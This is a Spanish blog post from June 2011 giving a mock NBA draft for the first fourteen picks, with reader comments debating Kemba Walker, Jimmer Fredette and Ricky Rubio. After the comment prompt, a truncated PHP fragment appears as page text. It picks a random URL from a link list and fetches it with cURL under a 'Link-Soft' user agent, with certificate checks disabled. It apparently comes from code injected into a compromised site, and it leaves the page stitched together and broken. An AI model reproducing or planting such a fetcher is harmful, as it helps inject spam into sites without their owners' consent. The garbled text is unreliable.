Mock Draft 2.0

14 de June de 2011 por txusma

Una vez finiquitada la final de la NBA llega el momento del draft. Hasta el 23 de Junio vamos a intentar seguir de cerca los movimientos y rumores que dé de sí este acontecimiento tan genuínamente americano. Tras la edición anterior de nuestro mock, os presentamos una actualización centrándonos en los rumores que más suenan. En negrita, mi elección.

Nº 1 – Cleveland Cavaliers: A Cleveland le tocó el gordo vía Clippers y ahora han de decidir a quien escoger en esta primera posición. Las opciones se reducen a 2: Kyrie Irving y Derrick Williams. Todo apunta a que se decantarán por el ex jugador de Duke pero la opción de escoger a Derrick Williams y después un base con su cuarta elección no está del todo descartada. Ramon Sessions ya puede ir preparando las maletas.

Nº 2 – Minnesota Timberwolves: La elección de los Wolves es la joya de la corona de este draft y es que parece ser que la franquicia de Minneapolis está muy dispuesta a venderla. Con Irving escogido todo comprador tiene clara su elección: Derrick Williams. Una buena cantidad de equipos se han interesado (Jazz, Wizards, Warriors, Suns, Rockets, Pacers, Sixers, Grizzlies, Celtics, Lakers…) pero el que parece tener más posibilidades es… Cleveland Cavaliers. A la ex franquicia de Lebron se le hace la boca agua solo de pensar en poder contar con los 2 mejores jugadores de la promoción aunque para ello tengan que enviar su elección número 4, su elección de 2012 y el expiring de Antawn Jamison. Otra opción es que los Wolves se decidan a rodear a Kevin Love y Ricky Rubio de jugadores más experimentados. En ese caso las opciones son muy numerosas.

Nº 3 – Utah Jazz: La elección de los Jazz depende mucho del workout que llevarán a cabo mañana. En él saltarán a la pista Brandon Knight, Kemba Walker y Jimmer Fredette y es que Utah tiene ganas de hacerse con los servicios de un buen base que apriete las clavijas a Devin Harris y le sustituya llegado el caso. La elección parece entre Knight y Walker pero si Fredette se impone se podrían decantar por Enes Kanter o Jonas Valanciunas y pillar al ex jugador de BYU en la elección número 12. Lo que no está claro es que les llegue.

Nº 4 – Cleveland Cavaliers: Si los Cavs conservan su elección y los 3 primeros han escogido según lo que presupongo la cosa estará entre Enes Kanter y Jonas Valanciunas aunque no hay que descartar a los aleros Jan Vesely y Kawhi Leonard. Si los Wolves se han hecho con la elección, que no os extrañe que la vuelvan a traspasar a cambio, esta vez sí, de un jugador más veterano como Monta Ellis.

Nº 5 – Toronto Raptors: Exceptuando la posición de escolta, que parece bien cubierta con Demar DeRozan, los Raptors necesitan de todo. Muchos piensan que podrían hacerse con un base suplente de Calderon como Kemba Walker (porque sería una gran sorpresa que Brandon Knight cayera hasta aquí) pero el crack de la March Madness tiene un estilo de juego muy parecido a Jerryd Bayless y Leandro Barbosa. Otros apuntan a que los canadienses necesitan un pívot como el comer y aquí entrarían en juego Jonas Valanciunas o, si está libre, Enes Kanter. De todas maneras, me decanto por el checo Jan Vesely para llenar el agujero negro que es ahora mismo la posición de 3.

Nº 6 – Washington Wizards: Otro equipo con un agujero importante en la posición de 3. En los últimos días se ha rumoreado que podrían jugar fuerte para hacerse con la elección número 2 traspasando esta elección y a Javale McGee para escoger, como no, a Derrick Williams. Si aún mantienen la elección y llega Jan Vesely es posible que se hagan con él pero si no, Kawhi Leonard parece la decisión obvia. Jonas Valanciunas también está en la pomada e incluso Enes Kanter aunque todo apunta a que también deberían subir posiciones en el draft para hacerse con el turco.

Nº 7 – Sacramento Kings: Están buscados los aleros… De nuevo Vesely y Leonard serían las elecciones si llegan libres hasta aquí pero la cosa no está clara. Chris Singleton, grandísimo defensor, parece perfecto para jugar al lado de los Tyreke, Cousins, Thorton, etc. pero sería una elección muy alta para él. Llegados a este punto la decisión es entre Kemba Walker y Jimmer Fredette y el ex de BYU tiene enamorados a los directivos de los Kings desde el workout que llevó a cabo hace unos días. Para mí que salta la sorpresa.

Nº 8- Detroit Pistons: Hay varios rumores que apuntan a que los Pistons podrían utilizar esta elección para deshacerse de los contratos de RIP Hamilton o Charlie Villanueva cosa que no parece nada descabellada.Si llegado el momento aún se encuentran en la tesitura de escoger parece que Jonas Valaciunas será el hombre. Un juego interior formado por Valanciunas y Monroe tiene muy buena pinta en unos años.

Nº 9 – Charlotte Bobcats: Les vendría bien que Jimmer Fredette anduviera aún libre pero no está muy claro que vaya a ser así. De todas maneras no es improbable que suban algunas posiciones en el draft así que a lo mejor tienen la oportunidad de seleccionarlo algo más arriba para asegurarse. Kwame Brown ha sido su center titular este año y hay que reconocer que no lo ha hecho nada mal aunque ahora queda libre y está por ver si renueva por el equipo de Michael Jordan. Si lo hace, unido al mal workout de Bismack Biyombo en el Eurocamp, las opciones de Kemba Walker crecen.

Nº 10 – Milwaukee Bucks: Dudo entre Alec Burks y Bismack Biyombo y es que cualquiera de los 2 jugadores aportaría cosas muy interesantes a la franquicia. Me quedo con el escolta debido al “vacío de poder” que hay ahora mismo en la anotación exterior de los Bucks tras las decepcionantes temporadas de John Salmons y Corey Maggette. ¡Ojo, que han sonado rumores de traspaso para Brandon Jennings! De ser así, si llegara Kemba Walker no lo dejarían escapar y no sería improbable.

Nº 11 – Golden State Warriors: Se respiran aires nuevos en Oakland tras la llegada de un nuevo propietario, un nuevo entrenador y probablemente un nuevo estilo de juego derivado del traspaso de Monta Ellis (se habla de Philadelphia, Bulls, Denver, Portland, Atlanta y Memphis). Para llenar su hueco nada mejor que Klay Thompson, el elegante escolta de Washington State.

Nº 12 – Utah Jazz: La decision de los Jazz dependerá de su elección en el número 3. Si han escogido a Enes Kanter y por un casual Kemba Walker o Jimmer Fredette estuvieran libres, podrían decantarse por uno de los dos. Si como se prevee, la elección ha sido Brandon Knight, la cosa se presenta más abierta. La salida de Andrei Kirilenko da muchas oportunidades a Chris Singleton, aunque siempre por detrás de otros aleros como Jan Vesely o Kawhi Leonard.

Nº 13 – Phoenix Suns: Marcin Gortat y Bismack Biyombo podrían hacer mucho daño en el juego interior sobretodo defensivamente. En ataque ya se encargará el gran Steve Nash de hacerlos funcionar.

Nº 14 – Houston Rockets: Con la retirada de Yao Ming planeando en el horizonte la necesidad de incorporar jugadores interiores parece imperiosa para los Rockets. Sin embargo, no es que quede mucha calidad a estas alturas del draft. Los gemelos Morris, Donatas Motiejunas y Tristan Thompson parecen ser los hombres.  Y si llega Biyombo, pues Biyombo.

Comenta

8 comentarios a esta entrada

  1. Loon dice:
    #1

    Lo de Jimmer Fredette parece un secreto a voces. Será divertido ver quien le elige. Charlotte parece un buen destino, faltará ver si suben estos puestos.

    Jan Vesely me parece una apuesta segura, no sé si Toronto tirará de la manta. Sería muy descabellado ver al checo en Salt Lake City? Demasiado parecido a Kirilenko?

    Algún “robo” a la vista?

      Citar

  2. HisRoyalAirness dice:
    #2

    Yo lo he dicho en mil foros y lo hago público aquí: creo que Ricky va a jugar de puta madre ya el primer año. En el Barça no le han dejado hacer nada, ha tenido que ceder toda responsabilidad y no ha podido tirar un carajo. El año que viene le daran la batuta, minutos SEGUIDOS y la certeza de que puede fallar y no pasa nada (cosa que no le ha pasado este año).

    Por cierto, que ha pasado con la “fiebre Kemba Walker”? Por qué ha pasado de barajarse como número uno a caer hasta casi el 10?

      Citar

  3. Blade Petrovic dice:
    #3

    Yo a Biyombo lo veo más alto entre 6 y 10 peropara mí será TOP 10.
    Por cierto lo de los trivials lo volveres a hacer.
    Saludos,Miquel

      Citar

  4. TheDeerHunter dice:
    #4

    Tal y como están las cosas ya es casi un milagro que saquemos lo que sacamos.
    Lo de los trivials ahora mismo es complicado.

      Citar

  5. Txusma dice:
    #5

    Las fiebres es lo que tienen, duran lo que duran. Walker podría salir en el número 5 de Toronto o caer un poco más. Su físico juego en su contra pero está claro que es un jugón. ¿Pasará de ser un simple buen suplente? Hay bastantes dudas con él.

      Citar

  6. Viva_Dirk dice:
    #6

    Walker es sin duda el mejor anotador exterior del draft, en ese aspecto es mas completo que Fredette, si actitud ha sido siempre muy buena y tiene todas las cualidades, si cae del 5 para mi es un robo.

      Citar

  7. Blade Petrovic dice:
    #7

    Pues que chasco yo con mis amigos me montado uno yo lo de los articulos estoy dispuesto a hacerlo

      Citar

  8. TheDeerHunter dice:
    #8

    Pues ahí tienes material para trilar a tus colegas, Blade Petrovic

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>